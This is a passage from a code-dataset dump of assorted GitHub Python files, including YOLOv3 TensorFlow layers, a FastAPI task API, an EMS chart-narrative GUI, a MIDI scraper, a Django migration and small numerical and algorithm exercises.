y_ends.append(y[up_start[i]] + int_frac * (y[up_end[i]]-y[up_start[i]]))\n flag.append(\"demag\")\n ## For the \"dn\" events the starting point is modified\n for i in range(len(dn_start)):\n f = interp1d(y[dn_start[i]:dn_end[i]+1], x[dn_start[i]:dn_end[i]+1], kind='zero')\n x_starts.append(f(y[dn_end[i]] - int_frac * (y[dn_end[i]]-y[dn_start[i]])))\n x_ends.append(x[dn_end[i]])\n y_starts.append(y[dn_end[i]] - int_frac * (y[dn_end[i]]-y[dn_start[i]]))\n y_ends.append(y[dn_end[i]])\n flag.append(\"mag\")\n \n y_starts = -2.5*np.log10(y_starts)\n y_ends = -2.5*np.log10(y_ends)\n\n return x_starts, x_ends, y_starts, y_ends, flag\n\ndef cc_count(curve):\n aux = np.where(curve==1)[0]\n red_ind = []\n if len(aux) > 1:\n red_ind.append(aux[0])\n for i in range(len(aux)-1):\n if aux[i+1] - aux[i] == 1:\n continue\n if aux[i+1] - aux[i] > 1:\n red_ind.append(aux[i+1])\n return len(red_ind)","repo_name":"fcneirad/event_finder","sub_path":"aux_functions.py","file_name":"aux_functions.py","file_ext":"py","file_size_in_byte":7259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37114691465","text":"# Create by Tony Che at 2020-01\n\n# DevicesCountInDomain.py\n# Feature description\n\nimport json\nfrom NetBrainIE import NetBrainIE, PrintMessage\nfrom NetBrainDB import NetBrainDB\nfrom Utils.NetBrainUtils import NetBrainUtils, CurrentMethodName, CreateGuid\n\nConfigFile = r'.\\conf\\DevicesCountInDomain31200.conf'\n\ndef DevicesCountInDomain(configFile=''):\n configFile = ConfigFile if configFile == '' else configFile\n config = NetBrainUtils.GetConfig(configFile)\n if len(config) == 0:\n PrintMessage('Failed to load the configuration file: ' + configFile, 'Error')\n return False\n\n try:\n ret = True\n app = NetBrainDB(config)\n if app.Login():\n dbDomain = app.GetDatabase(config['Domain Name'])\n subTypeNames = dbDomain.Device.distinct('subTypeName')\n for subTypeName in subTypeNames:\n deviceCountById = dbDomain.Device.count_documents({'subTypeName': subTypeName})\n print(''.join([str(subTypeName), \": \", str(deviceCountById)]))\n except Exception as e:\n PrintMessage('Exception raised: ' + str(e), 'Error')\n ret = False\n finally:\n app.Logout()\n return ret\n\n\nif __name__ == \"__main__\":\n DevicesCountInDomain()\n\n","repo_name":"duke5/NBPerfomance","sub_path":"NetBrain-master/DevicesCountInDomain.py","file_name":"DevicesCountInDomain.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"33176550200","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef integrand(x, a):\n return 1/np.sqrt(a**4 - x**4)\n\n#/ !!This is a slice of code from University of Michigan, because the 'gaussxw' module\n# from the textbook isn't available\n\ndef gaussxw(N):\n\n # Initial approximation to roots of the Legendre polynomial\n a = np.linspace(3,4*N-1,N)/(4*N+2)\n x = np.cos(np.pi*a+1/(8*N*N*np.tan(a)))\n\n # Find roots using Newton's method\n epsilon = 1e-15\n delta = 1.0\n while delta>epsilon:\n p0 = np.ones(N,float)\n p1 = np.copy(x)\n for k in range(1,N):\n p0,p1 = p1,((2*k+1)*x*p1-k*p0)/(k+1)\n dp = (N+1)*(p0-x*p1)/(1-x*x)\n dx = p1/dp\n x -= dx\n delta = max(abs(dx))\n\n # Calculate the weights\n w = 2*(N+1)*(N+1)/(N*N*(1-x*x)*dp*dp)\n\n return x,w\n\n\ndef gaussian_quadrature(a):\n N = 20\n #Weights and points for the Gaussian Quadrature for the interval [-1, 1]\n x, w = gaussxw(N)\n\n #Rescale the points and weights for the interval [0, a]\n x_rescaled = 0.5 * (a - 0) * x + 0.5 * (a + 0)\n w_rescaled = w * 0.5 * (a - 0)\n\n integral_value = np.dot(w_rescaled, integrand(x_rescaled, a))\n\n return np.sqrt(8) * integral_value\n\n#starting from 0.01 to avoid division by zero\namplitudes = np.linspace(0.01, 2, 400)\nperiods = [gaussian_quadrature(a) for a in amplitudes]\n\nplt.plot(amplitudes, periods)\nplt.xlabel('Amplitude (a)')\nplt.ylabel('Period (T)')\nplt.title('Period vs. Amplitude for V(x) = x^4')\nplt.savefig('Period vs. Amplitude.png')\nplt.show()\n","repo_name":"saladsushi/phys-ua210","sub_path":"ps-4/ps-4-q2.py","file_name":"ps-4-q2.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"33410187455","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('reddit_api', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='RedditImage',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('url', models.URLField()),\n ('reputation', models.IntegerField()),\n ],\n ),\n migrations.AddField(\n model_name='reddit',\n name='image',\n field=models.ForeignKey(blank=True, to='reddit_api.RedditImage', null=True),\n ),\n ]\n","repo_name":"fhanspach/reddit-image-viewer","sub_path":"reddit_api/migrations/0002_auto_20151014_1653.py","file_name":"0002_auto_20151014_1653.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"12726659003","text":"import re\n#Expressoes regulares\nprint(\"-----------------------------------------------------\")\npadrao = \"[0-9][a-z]{2}[0-9]\"\ntexto = \"123 1ac2 1cc aa1\"\nresposta = re.search(padrao,texto)\nprint(resposta.group())\n\npadrao2 = \"\\w{5,50}@[a-z]{3,10}.com.br\"\ntexto2 = \"aaabbbcc wanda123@gmail.com.br ccbbbaaa2 vision3@gmail.com.br\"\nresposta2 = re.search(padrao2, texto2)\nresposta3 = re.findall(padrao2,texto2)\n\nprint(resposta2.group())\nprint(resposta3)","repo_name":"Renato9889/PythonBrasilValidacaoDeDadosPadraoNacional","sub_path":"expressoes_regulares.py","file_name":"expressoes_regulares.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"37425808694","text":"import tensorflow as tf\nimport parameter\nfrom tensorflow.contrib.layers import xavier_initializer\nfrom tensorflow.keras.initializers import he_normal, he_uniform\n\n\ndef fixed_padding(input_tensor, kernel_size, mode='CONSTANT'):\n\n \"\"\"\n pad the input_tensor along the spatial dimension to achieve the same performance of\n 'same' padding but independent of the input size\n\n :param input_tensor: A tensor of size [batch, height, width, channel] (NHWC)\n :param kernel_size: The size of the kernel filter or the pool_size. Should be an positive integer\n :param mode: padding mode, default 'CONSTANT' which means padding zero value\n :return: output: A tensor after padding\n '''\n \"\"\"\n \n pad_total = kernel_size - 1\n pad_beg = pad_total // 2\n pad_end = pad_total - pad_beg\n \n output = tf.pad(tensor=input_tensor, \n paddings=[[0,0], [pad_beg, pad_end], [pad_beg, pad_end], [0,0]], \n mode=mode)\n \n return output\n\n\ndef Conv2d(input_tensor, n_filter, kernel_size, strides, batch_norm=True, activation=True, use_bias=False):\n\n \"\"\"\n\n :param input_tensor: input tensor of size [batch, height, width, channels]\n :param n_filter: number of filter used in the conv layer\n :param kernel_size: size of the filter can be an integer or a tuple of 2 elements\n :param strides: strides of the conv operation, can be an integer of tuple of 2 elements\n :param batch_norm: whether to use batch_normalisation default:True\n :param activation: whether to use the leaky_relu activation default:True\n :param use_bias: whether add bias to the kernel default: False\n :return:\n \"\"\"\n\n stride = strides[0]\n k = kernel_size[0]\n \n if stride > 1:\n input_tensor = fixed_padding(input_tensor, k)\n \n x = tf.layers.conv2d(inputs=input_tensor,\n filters=n_filter,\n kernel_size=kernel_size,\n strides=strides,\n padding=('same' if stride == 1 else 'valid'),\n activation=None,\n use_bias=use_bias,\n kernel_initializer=xavier_initializer())\n \n if batch_norm == True:\n # if we use batch_norm layers, we don't use bias terms\n batch_norm_params = {\n 'momentum' : parameter._BATCH_NORM_DECAY,\n 'epsilon' : parameter._BATCH_NORM_EPSILON,\n 'scale' : True,\n 'fused' : None,\n 'trainable' : True\n }\n \n x = tf.layers.batch_normalization(inputs=x, **batch_norm_params)\n \n if activation == True:\n x = tf.nn.leaky_relu(features=x, alpha= parameter._LEAKY_RELU)\n \n return x\n\n\ndef upsampling(input_tensor, strides=2):\n \n # tf implementation, data_format:NHWC\n height, width = input_tensor.get_shape().as_list()[1:3]\n new_size = (height * strides, width * strides)\n x = tf.image.resize_nearest_neighbor(images=input_tensor, size=new_size)\n \n return x\n\n\ndef Residual_block(input_tensor, n_filter):\n \n x = Conv2d(input_tensor, n_filter, (1,1), (1,1))\n x = Conv2d(x, n_filter*2, (3,3), (1,1))\n x = x + input_tensor \n return x\n\n\ndef Stack_Residual_block(input_tensor, n_filter, n_Repeat):\n x = Residual_block(input_tensor, n_filter)\n \n for i in range(n_Repeat-1):\n x = Residual_block(x, n_filter)\n \n return x\n\n\ndef yolo_block(input_tensor, num_filter):\n\n \"\"\"\n yolo convolution layer followed by the darknet53\n\n :param input_tensor: A tensor fo size [batch, height, width, channels]\n :param num_filter: number of filter\n :return: route: a feature map used in the following conv layers\n x: detection feature map\n \"\"\"\n\n x = Conv2d(input_tensor=input_tensor,\n n_filter=num_filter, \n kernel_size=(1,1), \n strides=(1,1))\n \n x = Conv2d(input_tensor=x,\n n_filter=num_filter * 2, \n kernel_size=(3,3),\n strides=(1,1))\n \n x = Conv2d(input_tensor=x, \n n_filter=num_filter,\n kernel_size=(1,1),\n strides=(1,1))\n \n x = Conv2d(input_tensor=x,\n n_filter=num_filter * 2,\n kernel_size=(3,3),\n strides=(1,1))\n \n x = Conv2d(input_tensor=x,\n n_filter=num_filter, \n kernel_size=(1,1), \n strides=(1,1))\n \n route = x\n \n x = Conv2d(input_tensor=x,\n n_filter=num_filter * 2,\n kernel_size=(3,3), \n strides=(1,1))\n \n return route, x\n\n\ndef detection_layer(input_tensor, n_classes, anchors, img_size):\n\n \"\"\"\n\n :param input_tensor: A tensor of size [batch, height, width, channels] (NHWC).\n :param n_classes: number of predicted classes\n :param anchors: List of tuple consist of size of the anchors (height, width)\n :param img_size: Size of the original input image\n :param cal_loss: whether used to calculate the loss\n :return: predictions: A tensor of size [batch, N*N, n_anchor*(5 + n_classes))]\n (N:size of the feature map,\n n_anchor: number of the anchor used in this feature map\n n_classes: number of classes in this model)\n\n location values are in range [0,1] (the same to yolo format)\n :return: raw_prediction: A tensor of size [batch, grid_size, grid_size, n_anchors, 5+n_classes\n this tensor is the raw output of the neural net.\n \"\"\"\n n_anchors = len(anchors)\n\n # detection conv layers. No batch_norm and activation(linear)\n predictions = Conv2d(input_tensor=input_tensor,\n n_filter=(n_anchors * (5 + n_classes)),\n kernel_size=(1,1),\n strides=(1,1),\n activation=False,\n batch_norm=False,\n use_bias=True)\n\n # get size of the feature map (height, width)\n grid_size = predictions.get_shape().as_list()[1:3]\n\n # save raw output for loss calculation\n raw_predictions = predictions\n raw_predictions = tf.reshape(raw_predictions, [-1, grid_size[0], grid_size[1], n_anchors, 5+n_classes])\n\n # total number of grids\n dim = grid_size[0] * grid_size[1]\n\n # total attributes of the bounding box (x,y, height, width, confidence)\n bbox_attrs = 5 + n_classes\n\n predictions = tf.reshape(predictions, [-1, n_anchors*dim, bbox_attrs])\n\n stride = (img_size[0] // grid_size[0], img_size[1] // grid_size[1])\n\n box_centers, box_sizes, confidence, classes = tf.split(value=predictions,\n num_or_size_splits=[2,2,1,n_classes],\n axis=-1)\n\n # apply sigmoid on x, y, confidence and classes(multiple label detection)\n box_centers = tf.nn.sigmoid(box_centers)\n confidence = tf.nn.sigmoid(confidence)\n classes = tf.nn.sigmoid(classes)\n\n # construct a offset grid for the feature map\n grid_x = tf.range(grid_size[0], dtype=tf.float32)\n grid_y = tf.range(grid_size[1], dtype=tf.float32)\n\n a, b = tf.meshgrid(grid_x, grid_y)\n\n x_offset = tf.reshape(a, (-1,1))\n y_offset = tf.reshape(b, (-1,1))\n\n x_y_offset = tf.concat([x_offset, y_offset], axis=-1)\n x_y_offset = tf.reshape(tf.tile(x_y_offset, [1, n_anchors]), [1, -1, 2])\n\n # output exact position of the centre\n box_centers = box_centers + x_y_offset\n box_centers = box_centers * stride\n\n # output exact size of the object\n anchors = tf.tile(anchors, [dim, 1])\n box_sizes = tf.exp(box_sizes) * anchors\n\n # normalize the location value in range [0,1]\n box_centers /= img_size\n box_sizes /= img_size\n\n predictions = tf.concat([box_centers, box_sizes, confidence, classes], axis=-1)\n\n grid = tf.reshape(x_y_offset, [-1, grid_size[0], grid_size[1], n_anchors, 2])\n box_xy = tf.reshape(box_centers, [-1, grid_size[0], grid_size[1], n_anchors, 2])\n box_wh = tf.reshape(box_sizes, [-1, grid_size[0], grid_size[1], n_anchors, 2])\n\n raw_data = (grid, raw_predictions, box_xy, box_wh)\n\n return predictions, raw_data\n","repo_name":"Zonghan666/Msc_Project","sub_path":"Yolov3/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":8328,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"9515372164","text":"def eprimo(n):\r\n \r\n menores_primos = [2,3,5,7] # criterio 1: estar nessa lista\r\n if n in menores_primos:\r\n return True\r\n else:\r\n for i in menores_primos: # criterio 2: ser multiplo dos menores primos\r\n nprimo = n % i\r\n if nprimo == 0:\r\n return False\r\n \r\n \r\n for divisor in range(2,n-1): # criterio 3: ter o resto diferente de 0 e quociente menor que o divisor\r\n resto = n % divisor\r\n quociente = n / divisor\r\n \r\n if (resto == 0):\r\n return False\r\n else:\r\n if (quociente < divisor):\r\n return True\r\n\r\n\r\ndef n_primos():\r\n numero = int(input(\"Digite um numero maior ou igual a 2: \"))\r\n\r\n quantidade = 0\r\n\r\n for i in range(2,numero):\r\n if eprimo(i) == True:\r\n quantidade += 1\r\n\r\n return quantidade\r\n","repo_name":"beelnunes/PraticandoPython","sub_path":"opcional.py","file_name":"opcional.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12911020843","text":"import PySimpleGUI as sg\nfrom EasyChart import Narrative\nsg.theme('DarkTeal9')\n\n# Main screen layout\nlayout1 = [\n [sg.Text('Type of chart: ', size=(15, 1))],\n [sg.Button(\"Transport\"), sg.Button(\"Refusal\"), sg.Button(\"911 Triage\"), sg.Button(\"911\")]\n]\n\n# Transport window layout\nlayoutTransport = [\n [sg.Text('Unit: ', size=(15,1)), sg.Push(), sg.InputText(key='unit')],\n [sg.Text('Dispatcher: ', size=(15,1)), sg.Push(), sg.InputText(key='dispatcher')],\n [sg.Text('From: ', size=(15,1)), sg.Push(), sg.InputText(key='origin')],\n [sg.Text('To: ', size=(15,1)), sg.Push(), sg.InputText(key='destination')],\n [sg.Text('Age: ', size=(15,1)), sg.Push(), sg.InputText(key='age')],\n [sg.Text('Sex: ', size=(15,1)), sg.Push(), sg.InputText(key='sex')],\n [sg.Text('Found position: ', size=(15,1)), sg.Push(), sg.InputText(key='pos')],\n [sg.Text('HPI: ', size=(15,1)), sg.Push(), sg.InputText(key='hpi')],\n [sg.Text('Transfer method: ', size=(15,1)), sg.Push(), sg.InputText(key='tmethod1')],\n [sg.Text('Taken to: ', size=(15, 1)), sg.Push(), sg.InputText(key='where')],\n [sg.Text('Transfer method: ', size=(15, 1)), sg.Push(), sg.InputText(key='tmethod2')],\n [sg.Text('Name and Cert #: ', size=(15, 1)), sg.Push(), sg.InputText(key='name')],\n [sg.Multiline('', size=(75, 30), key='OUTPUT')],\n [sg.Button('Generate Narrative', key=\"TransportT\")]\n]\n\n# 911 window layout\nlayout911 = [\n [sg.Text('Age: ', size=(15,1)), sg.Push(), sg.InputText(key='age911')],\n [sg.Text('Sex: ', size=(15,1)), sg.Push(), sg.InputText(key='sex911')],\n [sg.Text('L.O.C.: ', size=(15,1)), sg.Push(), sg.InputText(key='loc911')],\n [sg.Text('Found Position: ', size=(15,1)), sg.Push(), sg.InputText(key='pos911')],\n [sg.Text('Immediate life threats: ', size=(25,1)), sg.Push(), sg.InputText(key='life911')],\n [sg.Text('HPI: ', size=(15, 1)), sg.Push(), sg.InputText(key='hpi911')],\n [sg.Text('Downgrade? ', size=(15, 1)), sg.Push(), sg.InputText(key='downgrade911')],\n [sg.Text('STAIR CHAIR [1], REEVES [2], SCOOP [3], NONE [4]: ', size=(50, 1)), sg.Push(), sg.InputText(key='srs911')],\n [sg.Text('Transfer: [1] To stretcher, [2] To ambulance, [3] Sheet lift, [4] Stand and pivot: ', size=(65, 1)), sg.Push(), sg.InputText(key='tmethod911')],\n [sg.Text('Room: ', size=(15,1)), sg.Push(), sg.InputText(key='room911')],\n [sg.Text('TRANSFER TO BED: [1] Sheet Lift, [2] Assisted, [3] Ambulated: ', size=(55, 1)), sg.Push(), sg.InputText(key='tmethod2911')],\n [sg.Text('Name and Cert #: ', size=(15, 1)), sg.Push(), sg.InputText(key='name911')],\n [sg.Multiline('', size=(75, 30), key='OUTPUT911')],\n [sg.Button(\"Generate 911 Narrative\", key=\"911GEN\")]\n]\n\n# Triage window layout\nlayoutTriage = [\n [sg.Text('Age: ', size=(15,1)), sg.Push(), sg.InputText(key='ageT')],\n [sg.Text('Sex: ', size=(15,1)), sg.Push(), sg.InputText(key='sexT')],\n [sg.Text('L.O.C.: ', size=(15,1)), sg.Push(), sg.InputText(key='locT')],\n [sg.Text('Found Position: ', size=(15,1)), sg.Push(), sg.InputText(key='posT')],\n [sg.Text('Immediate life threats: ', size=(25,1)), sg.Push(), sg.InputText(key='lifeT')],\n [sg.Text('HPI: ', size=(15, 1)), sg.Push(), sg.InputText(key='hpiT')],\n [sg.Text('Downgrade? ', size=(15, 1)), sg.Push(), sg.InputText(key='downgradeT')],\n [sg.Text('STAIR CHAIR [1], REEVES [2], SCOOP [3], NONE [4]: ', size=(50, 1)), sg.Push(), sg.InputText(key='srsT')],\n [sg.Text('Transfer: [1] To stretcher, [2] To ambulance, [3] Sheet lift, [4] Stand and pivot: ', size=(65, 1)), sg.Push(),\n sg.InputText(key='tmethodT')],\n [sg.Text('Name and Cert #: ', size=(15, 1)), sg.Push(), sg.InputText(key='nameT')],\n [sg.Multiline('', size=(75, 30), key='OUTPUTT')],\n [sg.Button(\"Generate Triage Narrative\", key=\"Tr\")]\n]\n\n# Refusal window layout\nlayoutRefusal = [\n [sg.Text('Age: ', size=(15,1)), sg.Push(), sg.InputText(key='ageR')],\n [sg.Text('Sex: ', size=(15,1)), sg.Push(), sg.InputText(key='sexR')],\n [sg.Text('L.O.C.: ', size=(15,1)), sg.Push(), sg.InputText(key='locR')],\n [sg.Text('Found Position: ', size=(15,1)), sg.Push(), sg.InputText(key='posR')],\n [sg.Text('Immediate life threats: ', size=(29,1)), sg.Push(), sg.InputText(key='lifeR')],\n [sg.Text('HPI: ', size=(15, 1)), sg.Push(), sg.InputText(key='hpiR')],\n [sg.Text('Name and Cert #: ', size=(15, 1)), sg.Push(), sg.InputText(key='nameR')],\n [sg.Multiline('', size=(75, 30), key='OUTPUTR')],\n [sg.Button(\"Generate Refusal Narrative\", key=\"R\")]\n]\n\n# Layout settings\nlayoutN = [\n [sg.Column(layout1, key='-COL0-'), sg.Column(layoutTransport, visible=False, key='-COL1-'),\n sg.Column(layoutRefusal, visible=False, key='-COL2-'), sg.Column(layoutTriage, visible=False, key='-COL3-'),\n sg.Column(layout911, visible=False, key='-COL4-')],\n [sg.Exit(), sg.Push(), sg.Button('Back', key=\"back\")]\n]\n\nwindow = sg.Window('Easy Chart', layoutN, finalize=True)\nwindow.bind('', '-NEXT-')\nwindow.bind('', '-PREV-')\nlayoutN = 0\npreviousLayout = 0\n\n# Main UI loop\nwhile True:\n event, values = window.read()\n newClass = Narrative()\n if event == '-NEXT-':\n next_element = window.find_element_with_focus().get_next_focus()\n next_element.set_focus()\n if event == '-PREV-':\n prev_element = window.find_element_with_focus().get_previous_focus()\n prev_element.set_focus()\n if event in (None, 'Exit'):\n break\n if event == 'Transport':\n print(values['unit'])\n window[f'-COL{layoutN}-'].update(visible=False)\n layoutN = 1\n window[f'-COL{layoutN}-'].update(visible=True)\n event, values = window.read()\n if event == 'TransportT':\n narrative = newClass.narrativet(values[\"unit\"], values[\"dispatcher\"], values[\"origin\"],\n values[\"destination\"],\n values[\"age\"], values[\"sex\"], values[\"pos\"], values[\"hpi\"],\n values[\"tmethod1\"], values[\"where\"], values[\"tmethod2\"], values[\"name\"])\n window['OUTPUT'].update(value=narrative)\n if event == \"Refusal\":\n window[f'-COL{layoutN}-'].update(visible=False)\n layoutN = 2\n window[f'-COL{layoutN}-'].update(visible=True)\n if event == \"R\":\n narrativeR = newClass.refusal(values[\"ageR\"], values[\"sexR\"], values[\"locR\"], values[\"posR\"],\n values[\"lifeR\"], values[\"hpiR\"], values[\"nameR\"])\n window['OUTPUTR'].update(value=narrativeR)\n if event == '911 Triage':\n window[f'-COL{layoutN}-'].update(visible=False)\n layoutN = 3\n window[f'-COL{layoutN}-'].update(visible=True)\n if event == 'Tr':\n narrativeT = newClass.triage(values[\"ageT\"], values[\"sexT\"], values[\"locT\"], values[\"posT\"],\n values[\"lifeT\"], values[\"hpiT\"], values[\"downgradeT\"], values[\"srsT\"],\n values[\"tmethodT\"],values[\"nameT\"])\n window['OUTPUTT'].update(value=narrativeT)\n if event == \"911\":\n window[f'-COL{layoutN}-'].update(visible=False)\n layoutN = 4\n window[f'-COL{layoutN}-'].update(visible=True)\n if event == '911GEN':\n narrative911 = newClass.c911(values[\"age911\"], values[\"sex911\"], values[\"loc911\"], values[\"pos911\"],\n values[\"life911\"], values[\"hpi911\"], values[\"downgrade911\"], values[\"srs911\"],\n values[\"tmethod911\"], values[\"tmethod2911\"], values[\"room911\"],\n values[\"name911\"])\n window['OUTPUT911'].update(value=narrative911)\n if event == 'back':\n window[f'-COL{layoutN}-'].update(visible=False)\n layoutN = 0\n window[f'-COL{layoutN}-'].update(visible=True)\nwindow.close()","repo_name":"SanB-1/EMS-EasyChart","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"73390891528","text":"from os import error\r\nimport sqlite3\r\n\r\n# get all the products from the file products.txt for setup of db\r\ndef get_products():\r\n products = list()\r\n try:\r\n with open('products.txt') as f:\r\n for index, line in enumerate(f.readlines()):\r\n product = line.split('=')\r\n product[1] = int(product[1])\r\n product.insert(0, index+1)\r\n products.append(tuple(product))\r\n except Exception as err:\r\n raise err\r\n return products\r\n\r\n#variable declaration\r\nconnection = None\r\ncursor = None\r\n\r\n\r\n# connect to database and create products as mentioned in the products.txt file\r\ntry:\r\n connection = sqlite3.connect('codem\\ecommerceapi\\db.sqlite3')\r\n cursor = connection.cursor()\r\n cursor.execute('DELETE FROM simpleapi_product ')\r\n connection.commit()\r\n for product in get_products():\r\n cursor.execute(\"insert into simpleapi_product values (?, ?, ?)\", product)\r\n connection.commit()\r\nexcept Exception as e:\r\n print(e)\r\nfinally:\r\n cursor.close()\r\n connection.close()","repo_name":"harikrishna-gujje/ecommerce_api","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"2471061002","text":"import requests\nfrom bs4 import BeautifulSoup\nimport re\nimport os\nfrom joblib import Parallel, delayed\nfrom tqdm import tqdm\nos.makedirs(\"data/ichigos\", exist_ok=True)\n\nsuffix = [\n 'others',\n 'fi',\n *[item for item in 'abcdefghijklmnopqrstuvwxyz']\n]\n\npage_url = 'https://ichigos.com/sheets/'\nrequired_names = [\n ' for piano',\n '\"for piano\"',\n \"'for piano'\",\n \"'piano solo'\",\n \"('for piano')\",\n '(for piano)',\n 'a piano arrangement, for the advanced pianist',\n 'arranged for piano solo',\n 'for easier piano',\n 'for easy piano',\n 'for easy piano or mallets',\n 'for jazz piano',\n 'for piano',\n 'for piano ',\n 'for piano & flute',\n 'for piano (duet not included)',\n 'for piano (full rock version)',\n 'for piano (intermediate)',\n 'for piano (trust me! it sounds better on piano -dedicated to prissyrox4vr)',\n 'for piano (tv size)',\n 'for piano - [simplified]',\n 'for piano - midi made from a pdf from the net...',\n 'for piano 1',\n 'for piano [exercise 7th chords]',\n 'for piano [exercise chords]',\n 'for piano in c# major and easy c major',\n 'for piano only',\n 'for piano or harp',\n 'for piano or synthesizer ',\n 'for piano solo',\n 'for piano solo or lead sheet',\n 'for piano(based on bgm in ep8)',\n 'for piano, credits to kerengi on fiverr',\n \"for piano, from piano stories best '88-'08\",\n 'for piano, transcribed for sonickku',\n 'for piano, vibraphone',\n 'for piano, w/ optional ostinato',\n 'for piano; original key',\n 'for recoder/ piano easy',\n 'for simple piano',\n 'for solo piano',\n 'from final fantasy xv original soundtrack: piano arrangements',\n 'jazz piano',\n 'piano',\n 'piano ',\n 'piano (easier c major)',\n 'piano (original ab major)',\n 'piano (resubmit)',\n 'piano - advanced',\n 'piano arrangement',\n 'piano collection / medley',\n 'piano collections: moonlit melodies',\n 'piano cover',\n 'piano cover by eriol',\n 'piano medley',\n 'piano melody',\n 'piano sequence of song',\n 'piano sheet',\n 'piano solo',\n 'piano solo (revised)',\n 'piano solo with variations',\n 'piano version',\n 'piano, arranged',\n 'sheet music for piano',\n 'simple piano',\n 'simplifed piano',\n 'solo piano',\n 'strictly for piano',\n]\n\nmidi_request_prefix = \"https://ichigos.com\"\ndef parse_pages():\n print(\"Parsing URLs\")\n links = []\n for s in tqdm(suffix):\n soup = BeautifulSoup(requests.get(f\"{page_url}/{s}\").content, \"html.parser\")\n possible_tags = soup.find_all(href=re.compile(r\"type\\=midi\"))\n \n for item in possible_tags:\n n = item.find_previous_sibling(\"i\").text.lower()\n if n in required_names:\n links.append(f\"{midi_request_prefix}/{item.attrs['href']}\")\n return links\n\ndef download(link, i):\n path = os.path.join(\"data/ichigos\", f\"{i}_ichigo.mid\")\n\n with open(path, \"wb\") as f:\n f.write(requests.get(link).content)\n\nlinks = parse_pages()\nprint(\"Downloading MIDIs\")\nParallel(n_jobs=-1, prefer=\"processes\")(delayed(download)(l, i) for i, l in tqdm(enumerate(links), total=len(links)))\n\n","repo_name":"ojus1/MyMusicTransformer","sub_path":"scrape/ichigos.py","file_name":"ichigos.py","file_ext":"py","file_size_in_byte":3169,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"12115663255","text":"#0528 DP \n#왜 다이나믹 프로그래밍인가?\n#-> 그 전에 거쳐온 경로의 값을 기억하고, 뒤의 더 큰 문제에 이용한다.\n#-> 또한 우리는 마지막에 몇 번의 경우의 수를 통해 도착했는지를 알아내야 하기 때문에\n#-> dfs/bfs로 모든 탐색 경로를 지정하는 것이 아닌, dp를 통해 지나온 흐름을 기록하기만 하면 된다.\n\nn=int(input())\narray=[]\nfor y in range(n):\n array.append(list(map(int,input().split(\" \"))))\n\n#방향벡터\ndy=[0,1]\ndx=[1,0]\n#거쳐온 array의 위치를 기록하는 자료구조\nd=[[0] *n for _ in range(n)]\nd[0][0]=1\n\n#array배열에서 d를 갱신하는 함수\ndef find():\n for y in range(n):\n for x in range(n):\n if y==n-1 and x==n-1: #맨 오른쪽 아래에 도착\n return d[y][x]\n weight=array[y][x]\n for i in range(2):\n ny=y+dy[i]*weight\n nx=x+dx[i]*weight\n #범위가 벗어나지 않으면 거쳐갈 수 있음.\n if ny>=n or nx>=n: continue\n d[ny][nx]+=d[y][x]\n\nprint(find())","repo_name":"kwonET/2023CodingStudy","sub_path":"BomiKwon/dp/BOJ_1890_점프.py","file_name":"BOJ_1890_점프.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"1983288676","text":"from fastapi import APIRouter, HTTPException, Request, Depends\nfrom ...crud.db import get_crud_db\nfrom ...tasks.models import TaskCreate, Task, TaskRead\nfrom ...task_item.models import TaskItem, TaskItemCreate, TaskItemRead, TaskItemUpdate\nfrom ...users.models import User\nfrom ...users.manager import current_active_user\n\nrouter = APIRouter()\n\n\n@router.post(\"/tasks_item\")\nasync def create_task_item(\n request: Request, task_create: TaskItemCreate, db=Depends(get_crud_db), user: User = Depends(current_active_user)\n):\n task_model_obj = TaskItem(**task_create.dict())\n task = await db.create(task_model_obj)\n return task\n\n\n@router.get(\"/task_item\")\nasync def get_task_items(\n request: Request, task_id: int, db=Depends(get_crud_db)\n):\n tasks = await db.get_items_for_task(Task, task_id)\n return tasks\n\n@router.put(\"/tasks_item/{task_item_id}\")\nasync def update_task_item(\n task_item_id: int, task_update: TaskItemUpdate, db=Depends(get_crud_db), user: User = Depends(current_active_user)\n):\n await db.update_task_item(task_update, task_item_id)\n\n\n@router.delete(\"/tasks_item\")\nasync def delete_task_item(\n item_id: int, db=Depends(get_crud_db), user: User = Depends(current_active_user)\n):\n deleted_task = await db.delete_item(item_id)\n if deleted_task:\n return {\"message\": \"Task deleted successfully\"}\n else:\n raise HTTPException(status_code=404, detail=\"Task not found\")","repo_name":"ArberBajraktari/adhd-api","sub_path":"src/api/endpoints/tasksItem.py","file_name":"tasksItem.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"18903020244","text":"from django.contrib import admin\nfrom django.urls import path\nfrom . import views\n\napp_name = 